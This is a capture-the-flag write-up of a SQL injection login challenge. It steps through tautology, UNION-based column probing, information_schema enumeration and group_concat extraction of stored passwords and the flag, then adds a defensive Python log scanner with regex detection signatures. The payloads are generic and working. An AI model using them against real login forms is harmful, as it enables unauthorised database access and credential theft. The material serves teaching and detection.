This is clearly a SQL injection challenge.
Entering a quote in the username and password fields shows that the values are closed with single quotes.
Test input (username on the first line, password on the second):
q';test
123
Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'test' and password='123'' at line 1
The obvious next input is:
a
1' or 1=1#
Response:
Hello admin!
Your password is 'cf216d7205a8127885dc04d668789e7e'
A 32-character string? I tried it against MD5 lookups, but that failed.
Fortunately the injection point is already clear, so keep testing:
a
1'or 1=1 union select 1;#
Response:
The used SELECT statements have a different number of columns
Keep adding columns until:
a
1'or 1=1 union select 1,2,3;#
Response:
Hello admin!
Your password is 'cf216d7205a8127885dc04d668789e7e'
So the query has three columns. Next, find out which of them are echoed back to the page:
a
1'or 1=1 union select 1,2,3 limit 1,1;#
Response:
Hello 2!
Your password is '3'
So the second and third columns are echoed back to the page.
That makes the rest of the enumeration easy.
a
1'or 1=1 union select 1,database(),3 limit 1,1;#
Response:
Hello geek!
Your password is '3'
The current database is geek. Next, list its tables:
a
1'or 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1;#
Response:
Hello 2!
Your password is 'geekuser'
Moving to the next offset:
Hello 2!
Your password is 'l0ve1ysq1'
One offset further, the response is:
NO,Wrong username password!!!
So the tables are geekuser and l0ve1ysq1.
Guessing that the flag is in l0ve1ysq1:
a
1'or 1=1 union select 1,2,column_name from information_schema.columns where table_name='l0ve1ysq1' limit 1,1;#
Response:
Hello 2!
Your password is 'id'
Next offsets:
Hello 2!
Your password is 'username'
Hello 2!
Your password is 'password'
That gives three column names.
a
1'or 1=1 union select 1,2,password from geek.l0ve1ysq1 limit 1,1;#
Response:
Hello 2!
Your password is 'wo_tai_nan_le'
Next offsets:
Hello 2!
Your password is 'glzjin_wants_a_girlfriend'
Hello 2!
Your password is 'biao_ge_dddd_hm'
Hello 2!
Your password is 'linux_chuang_shi_ren'
Ugh, what is all this?
Use group_concat instead, so that every row comes back in one response:
a
1'or 1=1 union select 1,2,group_concat(password) from geek.l0ve1ysq1 limit 1,1;#
Response:
Hello 2!
Your password is 'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{1357753e-60f6-484b-9cbe-11b18875a87a}'
Done.
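From the defender's side, every request in this writeup leaves the same footprints in the login parameters: a quote followed by `or 1=1`, `union select`, `information_schema`, `group_concat`, and a trailing `#`. The following is an added example, not part of the writeup: a small scanner over constructed application log lines (the `timestamp client method path body` layout is an assumption of the demo) that URL-decodes the POST body, reports which of those signatures each parameter matched, and lists clients with repeated hits. Two benign logins, one with an apostrophe in the username, are included to show the signatures do not fire on ordinary input.

```python
import re
from urllib.parse import parse_qs

# Signatures for the pattern used in the writeup: quote-closing tautology,
# UNION column probing, information_schema enumeration, row aggregation with
# group_concat, and a trailing MariaDB '#' comment.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "row_aggregation": re.compile(r"\bgroup_concat\s*\(", re.I),
    "comment_tail": re.compile(r";?\s*#\s*$"),
}

# Constructed sample log: "<timestamp> <client> <method> <path> <url-encoded body>".
# The bodies reproduce requests from the writeup plus two benign logins.
SAMPLE_LOGS = [
    "2024-01-01T10:00:01Z 10.0.0.5 POST /login username=admin&password=hunter2",
    "2024-01-01T10:00:02Z 10.0.0.5 POST /login username=O%27Brien&password=pass",
    "2024-01-01T10:00:03Z 10.0.0.9 POST /login username=a&password=1%27+or+1%3D1%23",
    "2024-01-01T10:00:04Z 10.0.0.9 POST /login username=a&password=1%27or+1%3D1+union+select+1%2C2%2Ctable_name+from+information_schema.tables+where+table_schema%3Ddatabase%28%29+limit+1%2C1%3B%23",
    "2024-01-01T10:00:05Z 10.0.0.9 POST /login username=a&password=1%27or+1%3D1+union+select+1%2C2%2Cgroup_concat%28password%29+from+geek.l0ve1ysq1+limit+1%2C1%3B%23",
]


def classify_value(value):
    """Return the names of every signature that matches a decoded parameter value."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(value)]


def scan_line(line):
    """Parse one log line and return a finding per parameter that matched a signature."""
    timestamp, client, method, path, body = line.split(" ", 4)
    findings = []
    # parse_qs decodes %xx escapes and '+', so the signatures see the raw SQL text.
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = classify_value(value)
            if hits:
                findings.append({"time": timestamp, "client": client, "path": path,
                                 "param": param, "hits": hits, "value": value})
    return findings


def scan_logs(lines):
    return [finding for line in lines for finding in scan_line(line)]


def clients_to_review(findings, threshold=2):
    """Clients with at least `threshold` flagged requests: repeated probing, not a typo."""
    counts = {}
    for finding in findings:
        counts[finding["client"]] = counts.get(finding["client"], 0) + 1
    return sorted(client for client, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOGS)
    for finding in found:
        print(finding["time"], finding["client"], finding["param"],
              ",".join(finding["hits"]), repr(finding["value"]))
    print("review:", clients_to_review(found))
```

The signatures are deliberately narrow (a lone apostrophe never fires), and the client threshold separates one odd input from the multi-step enumeration this writeup performs; the real fix remains the parameterised query, with detection as the second layer.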